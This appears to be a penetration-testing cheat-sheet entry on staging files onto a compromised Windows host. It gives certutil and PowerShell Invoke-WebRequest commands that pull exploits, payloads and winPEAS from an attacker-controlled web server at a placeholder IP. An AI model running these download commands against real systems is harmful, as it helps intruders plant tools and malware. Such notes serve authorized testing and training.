Download Files to Windows with certutil / iwr
Pivoting & Transferwindowstool
Summary
Transfers files onto a Windows target from your attacker HTTP server using the built-in certutil (cmd) or Invoke-WebRequest (PowerShell).
Walkthrough
Two living-off-the-land ways to pull files (tools, exploits, payloads) onto a Windows host from a web server you control.
Steps
- Host the file on your attacker box (e.g.
python3 -m http.server 80). - On the target, download it with whichever shell you have:
- cmd —
certutilwith-urlcache -split -fand a local destination path:
``cmd certutil -urlcache -split -f http://<IP>/file.exe C:\Users\Public\file.exe ``
- PowerShell —
iwr(Invoke-WebRequest) writing to a local file:
``powershell iwr http://<IP>/winPEASany.exe -outfile winPEASany.exe ``
Commands
cmd
certutil -urlcache -split -f http://<IP>/file.exe C:\Users\Public\file.exe
powershell
iwr http://<IP>/winPEASany.exe -outfile winPEASany.exe